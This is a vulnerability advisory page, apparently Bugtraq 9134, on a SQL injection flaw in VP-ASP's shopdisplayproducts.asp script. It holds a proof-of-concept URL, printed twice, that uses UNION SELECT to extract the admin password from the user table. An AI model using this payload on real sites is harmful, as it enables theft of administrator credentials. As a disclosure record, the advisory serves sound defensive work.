Virtual Programming VP-ASP shopdisplayproducts.asp SQL Injection Vulnerability
BID:9134
Info
Virtual Programming VP-ASP shopdisplayproducts.asp SQL Injection Vulnerability
| Bugtraq ID: | 9134 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Dec 01 2003 12:00AM |
| Updated: | Dec 01 2003 12:00AM |
| Credit: | The disclosure of this issue has been credited to Nick Gudov <[email protected]>. |
| Vulnerable: |
Virtual Programming VP-ASP 5.00 Virtual Programming VP-ASP 4.00 |
| Not Vulnerable: | |
Discussion
Virtual Programming VP-ASP shopdisplayproducts.asp SQL Injection Vulnerability
It has been reported that VP-ASP may be prone to a SQL injection vulnerability that may allow an attacker to disclose sensitive information by supplying malicious SQL code to the underlying database. The problem exists in the 'shopdisplayproducts.asp' script of the software.
It has been reported that VP-ASP may be prone to a SQL injection vulnerability that may allow an attacker to disclose sensitive information by supplying malicious SQL code to the underlying database. The problem exists in the 'shopdisplayproducts.asp' script of the software.
Exploit / POC
Virtual Programming VP-ASP shopdisplayproducts.asp SQL Injection Vulnerability
The following proof of concept has been provided:
http://www.example.com/vpasp/shopdisplayproducts.asp?cat=qwerty'%20union%20select%20fldauto,fldpassword%20from%20tbluser%20where%20fldusername='admin'%20and%20fldpassword%20
like%20'a%25'--
The following proof of concept has been provided:
http://www.example.com/vpasp/shopdisplayproducts.asp?cat=qwerty'%20union%20select%20fldauto,fldpassword%20from%20tbluser%20where%20fldusername='admin'%20and%20fldpassword%20
like%20'a%25'--
Solution / Fix
References
Virtual Programming VP-ASP shopdisplayproducts.asp SQL Injection Vulnerability
References:
References:
- VP-ASP Homepage (Virtual Programming )